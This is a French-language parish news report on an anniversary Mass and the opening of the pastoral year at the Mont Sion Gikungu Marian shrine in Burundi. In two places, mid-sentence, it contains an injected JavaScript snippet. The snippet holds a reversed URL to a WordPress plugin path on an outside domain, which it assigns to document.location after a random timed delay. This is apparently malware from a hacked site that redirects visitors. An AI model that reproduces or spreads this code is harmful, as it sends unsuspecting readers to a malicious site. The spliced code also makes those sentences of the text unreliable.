La célébration eucharistique du 24 Octobre 2021, le 30e dimanche du temps ordinaire, a été un moment très spécial au Sanctuaire de la Reine de la Paix et la Réconciliation de Mont Sion Gikungu. Ce Dimanche n’a pas seulement coïncidé avec la Journée Mondiale de la Mission et l’ouverture solennelle de l’année pastorale 2021-2022, mais aussi c’était la célébration du 27e anniversaire de la consécration du Sanctuaire de Mont Sion Gikungu. Ainsi, la sainte messe a été animée en chants liturgiques conjointement par les chorales Sainte Famille et Pueri Cantores Maria Goretti. Elle a commencé par une impressionnante procession ponctuée par l’annonce de la Parole de Dieu tirée des quatre Evangiles sur quatre stations préalablement choisies.  Quant aux lectures du jour, elles ont été tirée du Livre du prophète Isaïe (2, 1-5), de l’épitre de saint Paul apôtre aux Romains (10, 9 -18) et l’Evangile selon saint Mathieu (28, 16- 20).

Dans un discours d’accueil aux pèlerins par le Recteur du sanctuaire, le Père Herménégilde Coyitungiye, qui était le célébrant principal, il a déclaré qu’il était très heureux d’accueillir les pèlerins au Sanctuaire en ce jour très spécial où l’on célébrait le 27e anniversaire du Sanctuaire. « En venant nombreux, c’est comme si on avait répondu aux paroles du prophète Isaïe », a-t- il dit. Il a alors annoncé que c’était une journée mondiale de la mission, dans le mois qu’on avait commencé avec Marie, puisqu’il lui était dédié. C’était alors un jour spécial pour trois raisons majeures comme ci-haut mentionné : journée mondiale de la mission, ouverture de l’année pastorale 2021-2022 et le 27e anniversaire du sanctuaire.  Celui-ci, depuis sa bénédiction par Son Excellence Monseigneur Simon Ntamwana en 1994, a déjà réalisé un total de 19 prêtres, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont certains sont en mission en Allemagne, au Congo et ailleurs. Cela faisait déjà deux ans qu’on avait célébré la Jubilée d’argent avec Monseigneur l’Archevêque Gervais qui a baptisé le Sanctuaire de la Reine de la Paix et la Réconciliation. Il a alors fait remarquer qu’en écoutant la parole d’aujourd’hui, on comprend bien la part du Sanctuaire dans l’évangélisation, et d’appeler les chrétiens à rendre grâce à la Vierge Marie qui a acceptée de trôner au Sanctuaire.

Le Père Recteur a fait savoir que l’Archevêque de Bujumbura a lancé un plan quinquennal pour s’approprier et mettre en pratique les clauses du synode diocésain avec comme devise « Edifions l’Eglise-Famille en possédant la Parole de Dieu, en la lisant et la mettant en pratique ». Il a alors appelé les fideles à répéter cette devise toujours avant les célébrations eucharistiques. Il a aussi fait savoir que cela faisait deux ans que la parole de Dieu a été eu une place importante dans toutes les activités du sanctuaire, ce qui signifie que la vierge Marie continue a soufflé à ses enfants, « Faites tout ce que mon Fils vous dira ». Il a alors fait savoir qu’au sanctuaire de la Reine de la Paix et la Réconciliation, on est solennellement entré dans la nouvelle année pastorale 2021-2022. Il a de même annoncé que le Sanctuaire, en collaboration avec le conseil élargi des pèlerins, a mis en place une devise construite sur celle de l’archidiocèse, qui va accompagner le Sanctuaire toute l’année 2021-2022: « Avec la vierge Marie, construisons une Eglise-Famille pour la guérison des mémoires ». Le Père Recteur a alors profité de cette occasion pour remercier tous ceux qui se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent corps et âmes pour le bon apostolat du Sanctuaire.

Après le discours par le Recteur, a suivi l’acclamation et la vénération de la Parole de Dieu qui venait d’être intronisé à l’église de la Sainte Trinité. Signalons qu’en place de l’homélie ordinaire par le célébrant de la messe, Père Recteur a lu aux pèlerins l’enseignement du Pape François que vous pouvez trouver sur ce lien : https://cmglobal.org/fr/2021/10/01/message-du-saint-pere-francois-pour-la-journee-mondiale-des-missions-2021/

Fulgence Ndayizeye